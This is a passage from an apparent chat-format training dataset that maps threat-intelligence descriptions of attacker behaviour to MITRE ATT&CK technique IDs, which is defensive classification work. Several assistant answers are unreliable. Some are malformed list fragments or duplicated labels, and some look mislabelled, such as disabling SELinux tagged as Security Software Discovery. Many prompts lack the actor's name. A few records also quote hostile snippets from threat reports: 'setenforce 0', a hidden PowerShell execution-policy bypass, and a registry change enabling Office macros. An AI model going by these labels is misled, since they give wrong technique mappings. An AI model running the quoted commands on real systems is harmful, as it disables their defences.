- "content": "CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs. The threat actors steal data from compromised systems over a long period of time, which likely indicates a long-term objective of monitoring the target's network. BRONZE PRESIDENT uses custom batch scripts to collect either specific file types (including files with .pptx, .xlsx, .pdf extensions) or all files within a specific location. CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts, such as social media and webmail accounts"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells."
- },
- {
- "role": "assistant",
- "content": "T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has injected the malware DLL into a target process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remote shells on Unix & Windows clients have a real tty with all keyboard signals working just like an SSH shell"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Catchamas adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockBit 2.0 has been known to self-propagate via SMB."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork has used spearphishing with an attachment to deliver files with exploits to initial victims."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to download and executes additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 compressed data into .zip files prior to exfiltrating it."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather information about TCP connection state."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant of encrypts some C2 with 3DES and RSA."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Sharpshooter, the threat actors relied on victims executing malicious Microsoft Word or PDF files."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti Group has used a program named ff.exe to search for specific documents on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower has collected system information on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates with its C2 servers through a TCP socket."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer collects the victim machine’s Windows GUID."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has executed a PowerShell command to download a file to the system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used AES for encryption of command and control traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In late July 2021, we identified an ongoing spear phishing campaign pushing Konni Rat to target Russia. Konni was first observed in the wild in 2014 and has been potentially linked to the North Korean APT group named APT37"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One version of Helminth uses a PowerShell script."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used password spraying to gain access to target systems."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ABK has the ability to identify the installed anti-virus product on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the victim's current time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used Remote Desktop Services on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the file /usr/sbin/setenforce exists, the malware executes the command, setenforce 0. This command configures the system’s Security-Enhanced Linux (SELinux) module, which provides support in the system's access control policies, into permissive mode — that is, setting the SELinux policy so that it is not enforced. If the system has the /etc/selinux/config file, it will write these commands into the file: SELINUX=disabled and SELINUXTYPE=targeted commands. The former disables the SELinux policy (or disallows one to be loaded), while the latter sets selected processes to run in confined domains"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has conducted spearphishing campaigns using malicious email attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy', 'T1021.004 - Remote Services: SSH', 'T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JCry has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can download files and additional malware components."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used dynamic DNS services for C2."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS can delete created registry keys as part of its cleanup procedure."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dumps usernames and passwords from Firefox, Internet Explorer, and Outlook."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used DNS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop has checked the keyboard language using the GetKeyboardLayout() function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the \"GetTextCharset\" function."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obfuscates C2 traffic with variable 4-byte XOR keys."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin uses a command prompt to run a PowerShell script from Excel. To assist in establishing persistence, RogueRobin creates \"%APPDATA%\\OneDrive.bat\" and saves the following string to it:\"powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\\OneDrive.ps1”\"."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 installed a Delphi backdoor that used a custom algorithm for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After being extricated from the network, Dark Halo then returned a second time, exploiting a vulnerability in the organization's Microsoft Exchange Control Panel. Near the end of this incident, Volexity observed the threat actor using a novel technique to bypass Duo multi-factor authentication (MFA) to access the mailbox of a user via the organization's Outlook Web App (OWA) service. Finally, in a third incident, Dark Halo breached the organization by way of its SolarWinds Orion software in June and July 2020"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies."
- },
- {
- "role": "assistant",
- "content": "T1176 - Browser Extensions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the OS version, CPU type, amount of RAM available from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These files can be parsed with lnk-parser to extract all contents"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sharpshooter's first-stage downloader installed Rising Sun to the startup folder \"%Startup%\\mssync.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can use HTTP and HTTPS for command and control communication."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captured screenshots and desktop video recordings."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has used base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used WMIC to execute a remote XSL script to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA gathers the victim’s IP address via the \"ipconfig -all\" command."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes and stores obfuscated Perl scripts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MobileOrder has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CARROTBAT has the ability to delete downloaded files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The crypter mainly contains junk code to increase entropy of the sample and hide the actual code. We have found 2 crypter variants with some code differences, but mostly with the same logic applied"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can retrieve usernames from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used compromised accounts to send spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1586.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can communicate over HTTP, SMTP, and POP3 for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZLib creates Registry keys to allow itself to run as various services."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar gathers information on local groups and members on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax has used decoy traffic to surround its malicious network traffic to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors had the ability to use FTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "YAHOYAH uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has downloaded additional malware to execute on victim systems."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can list the installed applications on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both backdoors target Arabic-speaking users. They use code that checks if the compromised machine has the Arabic language installed"
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery', 'T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has cleared select event log entries."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Gather the list of all files names listed in the Recent Items folder i.e. Appdata%\\Microsoft\\Windows\\Recent\". - Gather all names of files listed in the Desktop folder of the current user. Gather names of all files and programs listed in the Taskbar i.e. Get Microsoft Version Number from the registry, specifically from reg key/value: HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at: HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, the “Windows Folder.exe” file copies itself to C:\\Users\\\\AppData\\Roaming and creates a Windows shortcut (LNK) file in the victim’s Startup directory as a persistence mechanism"
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
